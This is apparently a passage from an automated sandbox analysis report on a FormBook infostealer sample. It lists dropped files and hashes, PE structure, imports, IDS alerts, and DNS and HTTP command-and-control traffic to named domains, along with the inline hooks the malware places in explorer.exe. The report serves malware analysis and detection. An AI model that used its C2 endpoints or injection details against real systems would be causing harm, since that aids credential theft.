                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L.....~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\naxsk

                  Download File
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5222
                  Entropy (8bit):6.125161523920119
                  Encrypted:false
                  SSDEEP:96:FAhV3vZOvLSjq3D+2flg3yDUfp7yxbEJhScKZTQOEbzjT:FAh3OvLSGCDCU7yxbEJhLKlQLD
                  MD5:724AADB7157867E0297086B8CB329FDD
                  SHA1:2CAF2D787B88C05EE73FC815F528D0519597BCEC
                  SHA-256:FF0DA8E72E0EB7C85762F73D269CB37E6EF6AB78BCDCDD02CBC600921B416A4F
                  SHA-512:939650530ED755EAEC138D0397CF69095159EACE33A5782094791F2315CBA3693F0FCC0DD2E40DEB4A3E58FD75010F52191FEF6E1053C1C5AE3EEA7CB4F9FE9D
                  Malicious:false
                  Reputation:low
                  Preview:......C.+.2...+.......5R.....5.+..5.....+...%..%.M5.......A5zA.V.%..%.M5...X...A5.A.~.%..%.M5...y...A5jA...%..%.M5.......A5.A.n+}.(4$..#...5..A5RA..C5.+...A5.A..C5.C..M.i.|$...C5....M.lA5...A.+..$.....+........%z..%...%j...%....%R..%..u.....C...A...+..%..%z..C5...A5...............+...C...C5....l...C........5.C5.C.35...C5.C.C..C.iC.i.A..A5.C5.C.2C..A.C5.C...l................l....._.........l...............l...C.+.......5..5.....M5zA5.+}....C5....C5.2A5.C5..A5........u..8C5..$..#..A..zA..VM5..$..i..A..zA..V$.$..#..M..z...._........|...A5...M5...%......A5.+}....+....5.....C5..l...C.+.2.....5..5.....M5.A5.+}....C5....C5.2A5.C5..A5........u...D...C5..$..#..A..A..nC5..$..i..A..A..nC5..$..y.A..A..nC5..$..#|.A..A..nM5..$..i..A..A..n$.$..#..M....................A5.+}....C5.C..A....%..%..%..%..%..1...A5.+}....+....5.....C5..l...C.+...5.....M5.A5.+}....C5....C5.2A5.C5..A5....L...u..8C5..$..#..A..A..C5..$..i..A..A..$.$..#..M....................A5....%..%..g..

                  C:\Users\user\AppData\Local\Temp\nsuD94B.tmp

                  Download File
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):281625
                  Entropy (8bit):7.654738046594992
                  Encrypted:false
                  SSDEEP:6144:c1bY08jwy5UakVtVNAKYULKX5d2/vq77i+9hiCkC:h0oUL/0Ukd2ki8hiCx
                  MD5:585D37FBFEFC8B840674B7FBDDDF74A4
                  SHA1:D4027F373F35D9CBDF5C52F98B30C81C74C61BDB
                  SHA-256:4E75A79C5CBEC5424037AF3B798D39110AD2247FC7E4F59DC69FA85E62C34C16
                  SHA-512:98C2B9ABBB5E8808C107F2232AF8ED047DE5E9445C6D27A6787021450317F66CBE717D492EA3A9D7B3F81AC8068B5BB317FA205CAA92FC93BA15945B6E79610B
                  Malicious:false
                  Reputation:low
                  Preview:........,...................;...8...........................................................................................................................................................................................................................................................G...............8...j...............................................................................................................................[.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.915739431814618
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:inlaww321345.exe
                  File size:277700
                  MD5:43e64e0ab6ca479c2af3afed56216a91
                  SHA1:983a822ffde2b558dfe2a8ac1dcc4d42df0f1d94
                  SHA256:cbdf1e33bc694b1ca634a4b042bd010050c9baf99078c91adf961ef92cebd305
                  SHA512:091159b524e3150e412a56f39193601b76fd644c8db4042293e37dfdc54c7d416efc1bfbec4c832fd7b54140b047cda55eee45d834b0fad40f50b800d95003f0
                  SSDEEP:6144:LOtIOKoTojUJuQVK0V4SwDTlAKht8Zy+ksPmQeSB+UGlk:LOLzoYJuQVK0V41GatH+kzQeSB+UGlk
                  TLSH:76441202EBB0C073E6A36E365D3E8B374DE5C9A25815AB2B4B547609BD766C2C10F743
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....

                  File Icon

                  Icon Hash:b2a88c96b2ca6a72

                  Static PE Info

                  General

                  Entrypoint:0x403646
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:61259b55b8912888e90f516ca08dc514

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A230h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080C8h]
                  mov esi, dword ptr [004080CCh]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007FBB449DEC1Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007FBB449DEBEAh
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [007A8B58h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000xa50.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x67c40x6800False0.675180288462data6.49518266675IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xa0000x39ebb80x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata0x3a90000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x3b90000xa500xc00False0.401692708333data4.18753619353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x3b91900x2e8dataEnglishUnited States
                  RT_DIALOG0x3b94780x100dataEnglishUnited States
                  RT_DIALOG0x3b95780x11cdataEnglishUnited States
                  RT_DIALOG0x3b96980x60dataEnglishUnited States
                  RT_GROUP_ICON0x3b96f80x14dataEnglishUnited States
                  RT_MANIFEST0x3b97100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                  Imports

                  DLLImport
                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.3188.114.96.1049808802031449 05/14/22-13:08:49.696707TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.3188.114.96.10
                  192.168.2.3188.114.96.1049808802031453 05/14/22-13:08:49.696707TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.3188.114.96.10
                  192.168.2.3188.114.96.1049808802031412 05/14/22-13:08:49.696707TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.3188.114.96.10

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 14, 2022 13:08:49.679449081 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.695677996 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.695893049 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.696707010 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.712908030 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.724560976 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.724622965 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.724986076 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.725151062 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.741282940 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:09:10.119378090 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.303877115 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.304033041 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.304163933 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.490811110 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.490907907 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.490958929 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.491028070 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.491060019 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.491131067 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.675293922 CEST8049810154.85.152.171192.168.2.3

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 14, 2022 13:08:49.640903950 CEST5015253192.168.2.38.8.8.8
                  May 14, 2022 13:08:49.670495033 CEST53501528.8.8.8192.168.2.3
                  May 14, 2022 13:09:09.940263033 CEST5663953192.168.2.38.8.8.8
                  May 14, 2022 13:09:10.118308067 CEST53566398.8.8.8192.168.2.3
                  May 14, 2022 13:09:30.653565884 CEST6272453192.168.2.38.8.8.8
                  May 14, 2022 13:09:30.674031019 CEST53627248.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  May 14, 2022 13:08:49.640903950 CEST192.168.2.38.8.8.80x9c1cStandard query (0)www.informacion-numero-24-h.siteA (IP address)IN (0x0001)
                  May 14, 2022 13:09:09.940263033 CEST192.168.2.38.8.8.80x8b0eStandard query (0)www.tzjisheng.comA (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.653565884 CEST192.168.2.38.8.8.80x8d9dStandard query (0)www.rodosmail.xyzA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  May 14, 2022 13:08:49.670495033 CEST8.8.8.8192.168.2.30x9c1cNo error (0)www.informacion-numero-24-h.site188.114.96.10A (IP address)IN (0x0001)
                  May 14, 2022 13:08:49.670495033 CEST8.8.8.8192.168.2.30x9c1cNo error (0)www.informacion-numero-24-h.site188.114.97.10A (IP address)IN (0x0001)
                  May 14, 2022 13:09:10.118308067 CEST8.8.8.8192.168.2.30x8b0eNo error (0)www.tzjisheng.com154.85.152.171A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)www.rodosmail.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.informacion-numero-24-h.site
                  • www.tzjisheng.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349808188.114.96.1080C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  May 14, 2022 13:08:49.696707010 CEST7579OUTGET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1
                  Host: www.informacion-numero-24-h.site
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:08:49.724560976 CEST7580INHTTP/1.1 301 Moved Permanently
                  Date: Sat, 14 May 2022 11:08:49 GMT
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: max-age=3600
                  Expires: Sat, 14 May 2022 12:08:49 GMT
                  Location: https://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q3jYpuw08wCTyYleUQgANz5%2FXm28vcSj4BwpLVOnE%2BnApx8wP1I2PlNxA8sjWRQIs%2Fbwiu%2BqJBI1neGaVXAUHTOBFP70cq8JwTnt1n%2F11%2Bw6rQ81FgayXw%2BWMDKdQyaFpmWylNMz5aZH9OSaPvxHi29l1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 70b32d9aab206937-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349810154.85.152.17180C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  May 14, 2022 13:09:10.304163933 CEST8190OUTGET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1
                  Host: www.tzjisheng.com
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:09:10.490811110 CEST8191INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Sat, 14 May 2022 11:09:10 GMT
                  Content-Type: text/html
                  Content-Length: 1780
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 b3 b1 d6 dd c7 b1 b3 bf ce c4 bb af b4 ab b2 a5 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 37 3b 26 23 35 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 2c 26 23 32 32 38 32 33 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 2c 26 23 33 33 36 30 39 3b 26 23 33 34 35 39 34 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 36 30 38 30 3b 26 23 33 38 36 35 36 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 32 31 32 30 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 37 3b 26 23 35 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 2c 26 23 32 32 38 32 33 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 2c 26 23 33 33 36 30 39 3b 26 23 33 34 35 39 34 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 36 30 38 30 3b 26 23 33 38 36 35 36 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 32 31 32 30 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 37 3b 26 23 35 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 2c 26 23 32 32 38 32 33 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 2c 26 23 33 33 36 30 39 3b 26 23 33 34 35 39 34 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 36 30 38
                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#26080;&#30721;&#26080;&#38656;&#25773;&#25918;&#22120;</title><meta name="keywords" content="&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#26080;&#30721;&#26080;&#38656;&#25773;&#25918;&#22120;" /><meta name="description" content="&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#2608


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function NameHook TypeActive in Processes
                  PeekMessageAINLINEexplorer.exe
                  PeekMessageWINLINEexplorer.exe
                  GetMessageWINLINEexplorer.exe
                  GetMessageAINLINEexplorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function NameHook TypeNew Data
                  PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:13:07:14
                  Start date:14/05/2022
                  Path:C:\Users\user\Desktop\inlaww321345.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\inlaww321345.exe"
                  Imagebase:0x400000
                  File size:277700 bytes
                  MD5 hash:43E64E0AB6CA479C2AF3AFED56216A91
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Target ID:1
                  Start time:13:07:15
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
